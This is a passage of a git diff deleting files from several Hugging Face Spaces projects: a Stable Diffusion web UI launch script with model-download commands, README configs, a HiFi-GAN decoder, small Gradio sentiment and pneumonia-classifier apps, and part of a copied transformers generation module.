https://huggingface.co/runwayml/stable-diffusion-v1-5/resolve/main/v1-5-pruned-emaonly.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/v1-5-pruned-emaonly.ckpt") - #os.system(f"wget -q https://huggingface.co/runwayml/stable-diffusion-inpainting/resolve/main/sd-v1-5-inpainting.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/sd-v1-5-inpainting.ckpt") - - #os.system(f"wget -q https://huggingface.co/Linaqruf/anything-v3.0/resolve/main/Anything-V3.0-pruned.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Anything-V3.0-pruned.ckpt") - #os.system(f"wget -q https://huggingface.co/Linaqruf/anything-v3.0/resolve/main/Anything-V3.0.vae.pt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Anything-V3.0-pruned.vae.pt") - - #os.system(f"wget -q https://huggingface.co/stabilityai/stable-diffusion-2/resolve/main/768-v-ema.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/768-v-ema.ckpt") - #os.system(f"wget -q https://raw.githubusercontent.com/Stability-AI/stablediffusion/main/configs/stable-diffusion/v2-inference-v.yaml -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/768-v-ema.yaml") - - os.system(f"wget -q https://huggingface.co/Lykon/NeverEnding-Dream/resolve/main/NeverEndingDream_1.22_BakedVae_fp16.safetensors -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/NeverEndingDream_1.22_BakedVae_fp16.safetensors") - os.system(f"wget -q https://huggingface.co/Lykon/NeverEnding-Dream/resolve/main/NeverEndingDream_ft_mse.safetensors -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/NeverEndingDream_ft_mse.safetensors") - - os.system(f"python launch.py --precision full --no-half --use-cpu SD BSRGAN ESRGAN SCUNet CodeFormer --all --ui-config-file /home/user/app/ui-config.json --ui-settings-file /home/user/app/config.json --disable-console-progressbars --enable-console-prompts --cors-allow-origins huggingface.co,hf.space --no-progressbar-hiding --api --skip-torch-cuda-test") - \ No newline at end of file diff --git a/spaces/MJ/AI-ChatBot/README.md b/spaces/MJ/AI-ChatBot/README.md deleted file mode 100644 index 263cdb1e57769f469d043974ca68b3c418bf08b1..0000000000000000000000000000000000000000 --- a/spaces/MJ/AI-ChatBot/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: AI ChatBot -emoji: 🏆 -colorFrom: blue -colorTo: gray -sdk: gradio -sdk_version: 3.33.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Manjushri/SDXL-1.0/README.md b/spaces/Manjushri/SDXL-1.0/README.md deleted file mode 100644 index a6e9553078c41b0c222816b76e44ae522ee883c5..0000000000000000000000000000000000000000 --- a/spaces/Manjushri/SDXL-1.0/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SDXL-1.0 -emoji: ⚡ -colorFrom: green -colorTo: indigo -sdk: gradio -sdk_version: 3.35.2 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Manmay/tortoise-tts/tortoise/models/hifigan_decoder.py b/spaces/Manmay/tortoise-tts/tortoise/models/hifigan_decoder.py deleted file mode 100644 index 17bdf890b5bf398743a96eaf77dec90fb6a33edd..0000000000000000000000000000000000000000 --- a/spaces/Manmay/tortoise-tts/tortoise/models/hifigan_decoder.py +++ /dev/null @@ -1,302 +0,0 @@ -# adopted from https://github.com/jik876/hifi-gan/blob/master/models.py -import torch -from torch import nn -from torch.nn import Conv1d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, weight_norm - -LRELU_SLOPE = 0.1 - - -def get_padding(k, d): - return int((k * d - d) / 2) - - -class ResBlock1(torch.nn.Module): - """Residual Block Type 1. It has 3 convolutional layers in each convolutional block. - - Network:: - - x -> lrelu -> conv1_1 -> conv1_2 -> conv1_3 -> z -> lrelu -> conv2_1 -> conv2_2 -> conv2_3 -> o -> + -> o - |--------------------------------------------------------------------------------------------------| - - - Args: - channels (int): number of hidden channels for the convolutional layers. - kernel_size (int): size of the convolution filter in each layer. - dilations (list): list of dilation value for each conv layer in a block. - """ - - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super().__init__() - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - ] - ) - - def forward(self, x): - """ - Args: - x (Tensor): input tensor. - Returns: - Tensor: output tensor. - Shapes: - x: [B, C, T] - """ - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - xt = c2(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - """Residual Block Type 2. It has 1 convolutional layers in each convolutional block. - - Network:: - - x -> lrelu -> conv1-> -> z -> lrelu -> conv2-> o -> + -> o - |---------------------------------------------------| - - - Args: - channels (int): number of hidden channels for the convolutional layers. - kernel_size (int): size of the convolution filter in each layer. - dilations (list): list of dilation value for each conv layer in a block. - """ - - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super().__init__() - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - - def forward(self, x): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class HifiganGenerator(torch.nn.Module): - def __init__( - self, - in_channels, - out_channels, - resblock_type, - resblock_dilation_sizes, - resblock_kernel_sizes, - upsample_kernel_sizes, - upsample_initial_channel, - upsample_factors, - inference_padding=5, - cond_channels=0, - conv_pre_weight_norm=True, - conv_post_weight_norm=True, - conv_post_bias=True, - ): - r"""HiFiGAN Generator with Multi-Receptive Field Fusion (MRF) - - Network: - x -> lrelu -> upsampling_layer -> resblock1_k1x1 -> z1 -> + -> z_sum / #resblocks -> lrelu -> conv_post_7x1 -> tanh -> o - .. -> zI ---| - resblockN_kNx1 -> zN ---' - - Args: - in_channels (int): number of input tensor channels. - out_channels (int): number of output tensor channels. - resblock_type (str): type of the `ResBlock`. '1' or '2'. - resblock_dilation_sizes (List[List[int]]): list of dilation values in each layer of a `ResBlock`. - resblock_kernel_sizes (List[int]): list of kernel sizes for each `ResBlock`. - upsample_kernel_sizes (List[int]): list of kernel sizes for each transposed convolution. - upsample_initial_channel (int): number of channels for the first upsampling layer. This is divided by 2 - for each consecutive upsampling layer. - upsample_factors (List[int]): upsampling factors (stride) for each upsampling layer. - inference_padding (int): constant padding applied to the input at inference time. Defaults to 5. - """ - super().__init__() - self.inference_padding = inference_padding - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_factors) - # initial upsampling layers - self.conv_pre = weight_norm(Conv1d(in_channels, upsample_initial_channel, 7, 1, padding=3)) - resblock = ResBlock1 if resblock_type == "1" else ResBlock2 - # upsampling layers - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_factors, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - # MRF blocks - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for _, (k, d) in enumerate(zip(resblock_kernel_sizes, resblock_dilation_sizes)): - self.resblocks.append(resblock(ch, k, d)) - # post convolution layer - self.conv_post = weight_norm(Conv1d(ch, out_channels, 7, 1, padding=3, bias=conv_post_bias)) - if cond_channels > 0: - self.cond_layer = nn.Conv1d(cond_channels, upsample_initial_channel, 1) - - if not conv_pre_weight_norm: - remove_weight_norm(self.conv_pre) - - if not conv_post_weight_norm: - remove_weight_norm(self.conv_post) - - self.device = torch.device('cuda' if torch.cuda.is_available() else'cpu') - if torch.backends.mps.is_available(): - self.device = torch.device('mps') - def forward(self, x, g=None): - """ - Args: - x (Tensor): feature input tensor. - g (Tensor): global conditioning input tensor. - - Returns: - Tensor: output waveform. - - Shapes: - x: [B, C, T] - Tensor: [B, 1, T] - """ - o = self.conv_pre(x) - if hasattr(self, "cond_layer"): - o = o + self.cond_layer(g) - for i in range(self.num_upsamples): - o = F.leaky_relu(o, LRELU_SLOPE) - o = self.ups[i](o) - z_sum = None - for j in range(self.num_kernels): - if z_sum is None: - z_sum = self.resblocks[i * self.num_kernels + j](o) - else: - z_sum += self.resblocks[i * self.num_kernels + j](o) - o = z_sum / self.num_kernels - o = F.leaky_relu(o) - o = self.conv_post(o) - o = torch.tanh(o) - return o - - @torch.no_grad() - def inference(self, c, g=None): - """ - Args: - x (Tensor): conditioning input tensor. - - Returns: - Tensor: output waveform. - - Shapes: - x: [B, C, T] - Tensor: [B, 1, T] - """ - # c = c.to(self.conv_pre.weight.device) - # c = torch.nn.functional.pad(c, (self.inference_padding, self.inference_padding), "replicate") - up_1 = torch.nn.functional.interpolate( - c.transpose(1,2), - scale_factor=[1024 / 256], - mode="linear", - ) - up_2 = torch.nn.functional.interpolate( - up_1, - scale_factor=[24000 / 22050], - mode="linear", - ) - g = g.unsqueeze(0) - return self.forward(up_2.to(self.device), g.transpose(1,2)) - - def remove_weight_norm(self): - print("Removing weight norm...") - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - remove_weight_norm(self.conv_pre) - remove_weight_norm(self.conv_post) diff --git a/spaces/Margaret/mazzuma-sentiment-engine/app.py b/spaces/Margaret/mazzuma-sentiment-engine/app.py deleted file mode 100644 index bacb6b6a7efa14cdf7bac075a43f50a5090a1055..0000000000000000000000000000000000000000 --- a/spaces/Margaret/mazzuma-sentiment-engine/app.py +++ /dev/null @@ -1,16 +0,0 @@ -import gradio as gr - -from transformers import pipeline - -pipe = pipeline("sentiment-analysis", model="cardiffnlp/twitter-roberta-base-sentiment-latest") - -def get_sentiment(input_text): - return pipe(input_text)[0]["label"] - -iface = gr.Interface(fn = get_sentiment, - inputs = "text", - outputs = 'text', - title= 'Sentiment Analysis', - description = 'Get Sentiment Negative/Positive/Neutral for the given input') - -iface.launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/Menna2211/Text-Image/README.md b/spaces/Menna2211/Text-Image/README.md deleted file mode 100644 index 6a2154fd6e571473d1d0e828c759e86201e445fd..0000000000000000000000000000000000000000 --- a/spaces/Menna2211/Text-Image/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Text Image -emoji: 🚀 -colorFrom: pink -colorTo: indigo -sdk: streamlit -sdk_version: 1.21.0 -app_file: Home.py -pinned: false ---- - -# TxT-Img diff --git a/spaces/MikoProduction/PneumoniaDetector/app.py b/spaces/MikoProduction/PneumoniaDetector/app.py deleted file mode 100644 index 8c3c17a5f7388f2a2f8ef1e8490c8da39a982d06..0000000000000000000000000000000000000000 --- a/spaces/MikoProduction/PneumoniaDetector/app.py +++ /dev/null @@ -1,77 +0,0 @@ -# 1. Imports and class names setup # -import gradio as gr -import os -import torch -from PIL import Image - -from model import ResNet101 -from timeit import default_timer as timer -from typing import Tuple, Dict - -# setup class names -class_names = ["normal", "pneumonia"] - -# 2. Model and transforms preparation # -model = ResNet101() - -# Load save weights -model.load_state_dict(torch.load(f="resnet101_pneumonia.pt", - map_location=torch.device("cpu"))) -model_transforms = model.transforms() - - -# 3. Predict function # - -# Create predict function - -def predict(img) -> Tuple[Dict, float]: - """ - Transforms and performs a prediction on img and returns prediction and time taken. - :param img: PIL image - :return: prediction and time taken - """ - # start the timer - start_time = timer() - - # transform target image and add batch dimension - img = model_transforms(img.convert("RGB")).unsqueeze(0) - - # put model into evaluation mode and turn on inference mode - model.eval() - with torch.inference_mode(): - # pass the transformed image through the model - # and turn the prediction logits into prediction probabilities - pred_probs = torch.sigmoid(model(img)) - - # create a prediction label and prediction probability for each class - pred_labels_and_probs = {class_names[0]: round(1 - float(pred_probs[0]), 4), - class_names[1]: round(float(pred_probs[0]), 4)} - - # calculate the prediction time - pred_time = round(timer() - start_time, 5) - - # return the prediction dictionary and prediction time - return pred_labels_and_probs, pred_time - - -# 4. Gradio app # - -# Create title, description and article strings -title = "PneumoniaDetector 👁" -description = "A ResNet101 feature extractor computer vision model to detect pneumonia" -article = "Please add chest X-Ray image" - -# create examples list from "examples/" directory -example_list = [["examples/" + example] for example in os.listdir("examples")] - -# create the Gradio demo -demo = gr.Interface(fn=predict, - inputs=gr.Image(type="pil"), - outputs=[gr.Label(num_top_classes=1, label="Predictions"), - gr.Number(label="Prediction time (s)")], - examples=example_list, - title=title, - description=description, - article=article) - -demo.launch() diff --git a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/detectors/panet.py b/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/detectors/panet.py deleted file mode 100644 index 135ee1e9af33e8207286d4990bd513dfd441176e..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/mmocr/models/textdet/detectors/panet.py +++ /dev/null @@ -1,12 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from mmocr.registry import MODELS -from .single_stage_text_detector import SingleStageTextDetector - - -@MODELS.register_module() -class PANet(SingleStageTextDetector): - """The class for implementing PANet text detector: - - Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel - Aggregation Network [https://arxiv.org/abs/1908.05900]. - """ diff --git a/spaces/MrVicente/RA-BART/custom_bart/bart_generation_mixin.py b/spaces/MrVicente/RA-BART/custom_bart/bart_generation_mixin.py deleted file mode 100644 index 2a8d26ab1edc8ab3827ad10764bab3593c6d763c..0000000000000000000000000000000000000000 --- a/spaces/MrVicente/RA-BART/custom_bart/bart_generation_mixin.py +++ /dev/null @@ -1,3272 +0,0 @@ -import inspect -import warnings -from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union - -import torch -import torch.distributed as dist -from torch import nn - -from transformers.generation_beam_constraints import Constraint, DisjunctiveConstraint, PhrasalConstraint -from transformers.generation_beam_search import BeamScorer, BeamSearchScorer, ConstrainedBeamSearchScorer -from transformers.generation_logits_process import ( - EncoderNoRepeatNGramLogitsProcessor, - ExponentialDecayLengthPenalty, - ForcedBOSTokenLogitsProcessor, - ForcedEOSTokenLogitsProcessor, - HammingDiversityLogitsProcessor, - InfNanRemoveLogitsProcessor, - LogitNormalization, - LogitsProcessorList, - MinLengthLogitsProcessor, - NoBadWordsLogitsProcessor, - NoRepeatNGramLogitsProcessor, - PrefixConstrainedLogitsProcessor, - RepetitionPenaltyLogitsProcessor, - TemperatureLogitsWarper, - TopKLogitsWarper, - TopPLogitsWarper, - TypicalLogitsWarper, -) -from transformers.generation_stopping_criteria import ( - MaxLengthCriteria, - MaxTimeCriteria, - StoppingCriteria, - StoppingCriteriaList, - validate_stopping_criteria, -) -from transformers.pytorch_utils import torch_int_div -from transformers.utils import ModelOutput - -from transformers.generation_utils import ( - SampleOutput, - BeamSearchOutput, - BeamSampleOutput, - GreedySearchOutput, GreedySearchDecoderOnlyOutput, SampleDecoderOnlyOutput, GreedySearchEncoderDecoderOutput, - BeamSearchDecoderOnlyOutput, BeamSearchEncoderDecoderOutput, BeamSampleDecoderOnlyOutput, - BeamSampleEncoderDecoderOutput, SampleEncoderDecoderOutput, -) -from utils import get_jump_chunks -from torch.nn.utils.rnn import pad_sequence - -class GenerationMixin: - """ - A class containing all functions for auto-regressive text generation, to be used as a mixin in [`PreTrainedModel`]. - - The class exposes [`~generation_utils.GenerationMixin.generate`], which can be used for: - - *greedy decoding* by calling [`~generation_utils.GenerationMixin.greedy_search`] if `num_beams=1` and - `do_sample=False`. - - *multinomial sampling* by calling [`~generation_utils.GenerationMixin.sample`] if `num_beams=1` and - `do_sample=True`. - - *beam-search decoding* by calling [`~generation_utils.GenerationMixin.beam_search`] if `num_beams>1` and - `do_sample=False`. - - *beam-search multinomial sampling* by calling [`~generation_utils.GenerationMixin.beam_sample`] if - `num_beams>1` and `do_sample=True`. - - *diverse beam-search decoding* by calling [`~generation_utils.GenerationMixin.group_beam_search`], if - `num_beams>1` and `num_beam_groups>1`. - - *constrained beam-search decoding* by calling [`~generation_utils.GenerationMixin.constrained_beam_search`], - if `constraints!=None` or `force_words_ids!=None`. - """ - - def _prepare_model_inputs( - self, - inputs: Optional[torch.Tensor] = None, - bos_token_id: Optional[int] = None, - model_kwargs: Optional[Dict[str, torch.Tensor]] = None, - ) -> Tuple[torch.Tensor, Optional[str], Dict[str, torch.Tensor]]: - """ - This function extracts the model-specific `inputs` for generation. - """ - # 1. retrieve all kwargs that are non-None or non-model input related. - # some encoder-decoder models have different names for model and encoder - if ( - self.config.is_encoder_decoder - and hasattr(self, "encoder") - and self.encoder.main_input_name != self.main_input_name - ): - input_name = self.encoder.main_input_name - else: - input_name = self.main_input_name - - model_kwargs = {k: v for k, v in model_kwargs.items() if v is not None or k != input_name} - - # 2. check whether model_input_name is passed as kwarg - # if yes and `inputs` is None use kwarg inputs - inputs_kwarg = model_kwargs.pop(input_name, None) - if inputs_kwarg is not None and inputs is not None: - raise ValueError( - f"`inputs`: {inputs}` were passed alongside " - f"{input_name} which is not allowed." - f"Make sure to either pass {inputs} or {input_name}=..." - ) - elif inputs_kwarg is not None: - inputs = inputs_kwarg - - # 3. models with `input_ids` can also make use of `inputs_embeds` - if self._can_retrieve_inputs_from_name(inputs, "inputs_embeds", model_kwargs): - inputs, input_name = model_kwargs["inputs_embeds"], "inputs_embeds" - - # 4. Only encoder-decoder models can have non `input_ids` input format - if not self.config.is_encoder_decoder and input_name != "input_ids": - raise ValueError( - f"If {input_name} is passed as model-specific keyword " - "input then model has to be an encoder-decoder and not a " - f"{self.__class__.__name__}." - ) - - # 5. if `inputs` is still None, try to create `input_ids` from BOS token - if inputs is None: - inputs = self._prepare_input_ids_for_generation(bos_token_id, model_kwargs.get("encoder_outputs")) - - return inputs, input_name, model_kwargs - - def _can_retrieve_inputs_from_name( - self, inputs: Optional[torch.Tensor], name: str, model_kwargs: Dict[str, torch.Tensor] - ) -> torch.Tensor: - """ - If `inputs` is None and `name` is in both forward function and keyword arguments, then inputs can be retrieved - from name - """ - can_retrieve_inputs = model_kwargs.get(name, None) is not None and name in set( - inspect.signature(self.forward).parameters.keys() - ) - - if can_retrieve_inputs and inputs is not None: - raise ValueError(f"Cannot only pass one of {name} and {self.main_input_name}") - - return can_retrieve_inputs - - def prepare_inputs_for_generation(self, input_ids: torch.LongTensor, **kwargs) -> Dict[str, Any]: - """ - Implement in subclasses of [`PreTrainedModel`] for custom behavior to prepare inputs in the generate method. - """ - return {"input_ids": input_ids} - - def adjust_logits_during_generation(self, logits: torch.FloatTensor, **kwargs) -> torch.FloatTensor: - """ - Implement in subclasses of [`PreTrainedModel`] for custom behavior to adjust the logits in the generate method. - """ - return logits - - def _prepare_input_ids_for_generation( - self, bos_token_id: Optional[int], encoder_outputs: Optional[ModelOutput] - ) -> torch.LongTensor: - if self.config.is_encoder_decoder and encoder_outputs is not None: - # make dummy input_ids with value -100, as a sanity check ensuring that they won't be used for encoding - shape = encoder_outputs.last_hidden_state.size()[:-1] - return torch.ones(shape, dtype=torch.long, device=self.device) * -100 - - if bos_token_id is None: - raise ValueError("`bos_token_id` has to be defined when no `input_ids` are provided.") - return torch.ones((1, 1), dtype=torch.long, device=self.device) * bos_token_id - - def _prepare_attention_mask_for_generation( - self, - inputs: torch.Tensor, - pad_token_id: int, - eos_token_id: int, - ) -> torch.LongTensor: - is_input_ids = len(inputs.shape) == 2 and inputs.dtype in [torch.int, torch.long] - is_pad_token_in_inputs = (pad_token_id is not None) and (pad_token_id in inputs) - is_pad_token_not_equal_to_eos_token_id = (eos_token_id is None) or ( - (eos_token_id is not None) and (pad_token_id != eos_token_id) - ) - # Check if input is input_ids and padded -> only then is attention_mask defined - if is_input_ids and is_pad_token_in_inputs and is_pad_token_not_equal_to_eos_token_id: - return inputs.ne(pad_token_id).long() - else: - return torch.ones(inputs.shape[:2], dtype=torch.long, device=inputs.device) - - def _prepare_encoder_decoder_kwargs_for_generation( - self, inputs_tensor: torch.Tensor, model_kwargs, model_input_name: Optional[str] = None - ) -> Dict[str, Any]: - # 1. get encoder - encoder = self.get_encoder() - - # 2. prepare encoder args and encoder kwargs from model kwargs - irrelevant_prefix = ["decoder_", "cross_attn", "use_cache"] - encoder_kwargs = { - argument: value - for argument, value in model_kwargs.items() - if not any(argument.startswith(p) for p in irrelevant_prefix) - } - print('encoder_kwargs:', encoder_kwargs) - - # 3. make sure that encoder returns `ModelOutput` - model_input_name = model_input_name if model_input_name is not None else self.main_input_name - encoder_kwargs["return_dict"] = True - encoder_kwargs[model_input_name] = inputs_tensor - model_kwargs["encoder_outputs"]: ModelOutput = encoder(**encoder_kwargs) - - return model_kwargs - - def _prepare_decoder_input_ids_for_generation( - self, - batch_size: int, - decoder_start_token_id: int = None, - bos_token_id: int = None, - model_kwargs: Optional[Dict[str, torch.Tensor]] = None, - device: torch.device = None, - ) -> torch.LongTensor: - - if model_kwargs is not None and "decoder_input_ids" in model_kwargs: - return model_kwargs.pop("decoder_input_ids") - else: - decoder_start_token_id = self._get_decoder_start_token_id(decoder_start_token_id, bos_token_id) - if device is None: - device = self.device - return torch.ones((batch_size, 1), dtype=torch.long, device=device) * decoder_start_token_id - - def _get_decoder_start_token_id(self, decoder_start_token_id: int = None, bos_token_id: int = None) -> int: - decoder_start_token_id = ( - decoder_start_token_id if decoder_start_token_id is not None else self.config.decoder_start_token_id - ) - bos_token_id = bos_token_id if bos_token_id is not None else self.config.bos_token_id - - if decoder_start_token_id is not None: - return decoder_start_token_id - elif ( - hasattr(self.config, "decoder") - and hasattr(self.config.decoder, "decoder_start_token_id") - and self.config.decoder.decoder_start_token_id is not None - ): - return self.config.decoder.decoder_start_token_id - elif bos_token_id is not None: - return bos_token_id - elif ( - hasattr(self.config, "decoder") - and hasattr(self.config.decoder, "bos_token_id") - and self.config.decoder.bos_token_id is not None - ): - return self.config.decoder.bos_token_id - raise ValueError( - "`decoder_start_token_id` or `bos_token_id` has to be defined for encoder-decoder generation." - ) - - @staticmethod - def _expand_inputs_for_generation( - input_ids: torch.LongTensor, - expand_size: int = 1, - is_encoder_decoder: bool = False, - attention_mask: Optional[torch.LongTensor] = None, - encoder_outputs: Optional[ModelOutput] = None, - **model_kwargs, - ) -> Tuple[torch.LongTensor, Dict[str, Any]]: - expanded_return_idx = ( - torch.arange(input_ids.shape[0]).view(-1, 1).repeat(1, expand_size).view(-1).to(input_ids.device) - ) - input_ids = input_ids.index_select(0, expanded_return_idx) - - if "token_type_ids" in model_kwargs: - token_type_ids = model_kwargs["token_type_ids"] - model_kwargs["token_type_ids"] = token_type_ids.index_select(0, expanded_return_idx) - - if attention_mask is not None: - model_kwargs["attention_mask"] = attention_mask.index_select(0, expanded_return_idx) - - if is_encoder_decoder: - if encoder_outputs is None: - raise ValueError("If `is_encoder_decoder` is True, make sure that `encoder_outputs` is defined.") - encoder_outputs["last_hidden_state"] = encoder_outputs.last_hidden_state.index_select( - 0, expanded_return_idx.to(encoder_outputs.last_hidden_state.device) - ) - model_kwargs["encoder_outputs"] = encoder_outputs - return input_ids, model_kwargs - - @staticmethod - def _update_model_kwargs_for_generation( - outputs: ModelOutput, model_kwargs: Dict[str, Any], is_encoder_decoder: bool = False - ) -> Dict[str, Any]: - # update past - if "past_key_values" in outputs: - model_kwargs["past"] = outputs.past_key_values - elif "mems" in outputs: - model_kwargs["past"] = outputs.mems - elif "past_buckets_states" in outputs: - model_kwargs["past"] = outputs.past_buckets_states - else: - model_kwargs["past"] = None - - # update token_type_ids with last value - if "token_type_ids" in model_kwargs: - token_type_ids = model_kwargs["token_type_ids"] - model_kwargs["token_type_ids"] = torch.cat([token_type_ids, token_type_ids[:, -1].unsqueeze(-1)], dim=-1) - - # update attention mask - if not is_encoder_decoder: - if "attention_mask" in model_kwargs: - attention_mask = model_kwargs["attention_mask"] - model_kwargs["attention_mask"] = torch.cat( - [attention_mask, attention_mask.new_ones((attention_mask.shape[0], 1))], dim=-1 - ) - - return model_kwargs - - def _reorder_cache(self, past, beam_idx): - raise NotImplementedError( - f"Make sure that a `_reorder_cache` function is correctly implemented in {self.__class__.__module__} to enable beam search for {self.__class__}" - ) - - def _get_logits_warper( - self, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - temperature: Optional[float] = None, - num_beams: Optional[int] = None, - renormalize_logits: Optional[bool] = None, - ) -> LogitsProcessorList: - """ - This class returns a [`LogitsProcessorList`] list object that contains all relevant [`LogitsWarper`] instances - used for multinomial sampling. - """ - - # init warp parameters - top_k = top_k if top_k is not None else self.config.top_k - top_p = top_p if top_p is not None else self.config.top_p - typical_p = typical_p if typical_p is not None else self.config.typical_p - temperature = temperature if temperature is not None else self.config.temperature - # instantiate warpers list - warpers = LogitsProcessorList() - - # the following idea is largely copied from this PR: https://github.com/huggingface/transformers/pull/5420/files - # all samplers can be found in `generation_utils_samplers.py` - if temperature is not None and temperature != 1.0: - warpers.append(TemperatureLogitsWarper(temperature)) - if top_k is not None and top_k != 0: - warpers.append(TopKLogitsWarper(top_k=top_k, min_tokens_to_keep=(2 if num_beams > 1 else 1))) - if top_p is not None and top_p < 1.0: - warpers.append(TopPLogitsWarper(top_p=top_p, min_tokens_to_keep=(2 if num_beams > 1 else 1))) - if typical_p is not None and typical_p < 1.0: - warpers.append(TypicalLogitsWarper(mass=typical_p, min_tokens_to_keep=(2 if num_beams > 1 else 1))) - # `LogitNormalization` should always be the last logit processor, when present - if renormalize_logits is True: - warpers.append(LogitNormalization()) - return warpers - - def _get_logits_processor( - self, - repetition_penalty: float, - no_repeat_ngram_size: int, - encoder_no_repeat_ngram_size: int, - input_ids_seq_length: int, - encoder_input_ids: torch.LongTensor, - bad_words_ids: List[List[int]], - min_length: int, - max_length: int, - eos_token_id: int, - forced_bos_token_id: int, - forced_eos_token_id: int, - prefix_allowed_tokens_fn: Callable[[int, torch.Tensor], List[int]], - num_beams: int, - num_beam_groups: int, - diversity_penalty: float, - remove_invalid_values: bool, - exponential_decay_length_penalty: Tuple, - logits_processor: Optional[LogitsProcessorList], - renormalize_logits: Optional[bool], - ) -> LogitsProcessorList: - """ - This class returns a [`LogitsProcessorList`] list object that contains all relevant [`LogitsProcessor`] - instances used to modify the scores of the language model head. - """ - processors = LogitsProcessorList() - - # init warp parameters - repetition_penalty = repetition_penalty if repetition_penalty is not None else self.config.repetition_penalty - no_repeat_ngram_size = ( - no_repeat_ngram_size if no_repeat_ngram_size is not None else self.config.no_repeat_ngram_size - ) - encoder_no_repeat_ngram_size = ( - encoder_no_repeat_ngram_size - if encoder_no_repeat_ngram_size is not None - else self.config.encoder_no_repeat_ngram_size - ) - bad_words_ids = bad_words_ids if bad_words_ids is not None else self.config.bad_words_ids - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - diversity_penalty = diversity_penalty if diversity_penalty is not None else self.config.diversity_penalty - forced_bos_token_id = ( - forced_bos_token_id if forced_bos_token_id is not None else self.config.forced_bos_token_id - ) - forced_eos_token_id = ( - forced_eos_token_id if forced_eos_token_id is not None else self.config.forced_eos_token_id - ) - remove_invalid_values = ( - remove_invalid_values if remove_invalid_values is not None else self.config.remove_invalid_values - ) - exponential_decay_length_penalty = ( - exponential_decay_length_penalty - if exponential_decay_length_penalty is not None - else self.config.exponential_decay_length_penalty - ) - # instantiate processors list - - # the following idea is largely copied from this PR: https://github.com/huggingface/transformers/pull/5420/files - # all samplers can be found in `generation_utils_samplers.py` - if diversity_penalty is not None and diversity_penalty > 0.0: - processors.append( - HammingDiversityLogitsProcessor( - diversity_penalty=diversity_penalty, num_beams=num_beams, num_beam_groups=num_beam_groups - ) - ) - if repetition_penalty is not None and repetition_penalty != 1.0: - processors.append(RepetitionPenaltyLogitsProcessor(penalty=repetition_penalty)) - if no_repeat_ngram_size is not None and no_repeat_ngram_size > 0: - processors.append(NoRepeatNGramLogitsProcessor(no_repeat_ngram_size)) - if encoder_no_repeat_ngram_size is not None and encoder_no_repeat_ngram_size > 0: - if self.config.is_encoder_decoder: - processors.append(EncoderNoRepeatNGramLogitsProcessor(encoder_no_repeat_ngram_size, encoder_input_ids)) - else: - raise ValueError( - "It's impossible to use `encoder_no_repeat_ngram_size` with decoder-only architecture" - ) - if bad_words_ids is not None: - processors.append(NoBadWordsLogitsProcessor(bad_words_ids, eos_token_id)) - if min_length is not None and eos_token_id is not None and min_length > 